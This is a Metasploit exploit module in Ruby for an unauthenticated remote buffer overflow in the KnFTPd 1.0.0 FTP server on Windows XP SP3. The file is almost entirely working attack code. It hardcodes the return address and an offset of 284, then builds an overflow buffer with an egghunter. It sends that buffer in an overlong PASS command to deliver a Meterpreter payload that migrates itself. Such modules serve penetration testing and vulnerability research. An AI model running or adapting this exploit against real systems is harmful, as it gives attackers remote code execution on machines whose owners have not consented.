##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'KnFTPd 1.0.0 Server Remote Buffer Overflow Vulnerability',
			'Description'	=> %q{
						This module exploits a vulnerability in the KnFTP FTP service without
					authenticated required, A long FTP command value will result in a
					buffer overflow. This Allows you to gain control as the user who
					started the application. 

			},
			'License'		=> MSF_LICENSE,
			'Author'		=>
				[
					'Qixu Liu', # Original discovery
					'Blake', # Orginal exploit 
					'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
				],
			'Version'		=> '$Revision$',
			'References'	=>
				[
					[ 'URL', 'http://secunia.com/advisories/45907' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17819/' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17856/' ],
				],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'false',
                                },
			'Platform'	=> 'win',
			'Payload'	=>
				{
					'BadChars' => "\x00",
					'InitialAutoRunScript' => 'migrate -f',
				},

			'Targets'		=>
				[
					[ 'Windows XP SP3 English',
						{
							'Ret'   	=>	0x662eb24f,
							'Offset'	=>	284
						}
					], # JMP ESP - hnetcfg.dll
				],
			'Privileged'	=> false,
			'DisclosureDate'	=> 'Sep 02 2011',
			'DefaultTarget'	=> 0))

	end

	def exploit

		# Used egghunter since payload space between start of buffer and EIP is to small for
		# meterpreter payload
		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

		buffer = egg
		buffer << rand_text_alpha(target['Offset']-buffer.length)
		buffer << [target.ret].pack('V')
		buffer << make_nops(4)
		buffer << hunter

		# If you overwrite SEH it only adds 65 bytes past EIP

		print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")

		connect
		send_cmd(['PASS', buffer], true)
		handler
		disconnect
	end
end


=begin
http://dev.metasploit.com/redmine/issues/5471
=end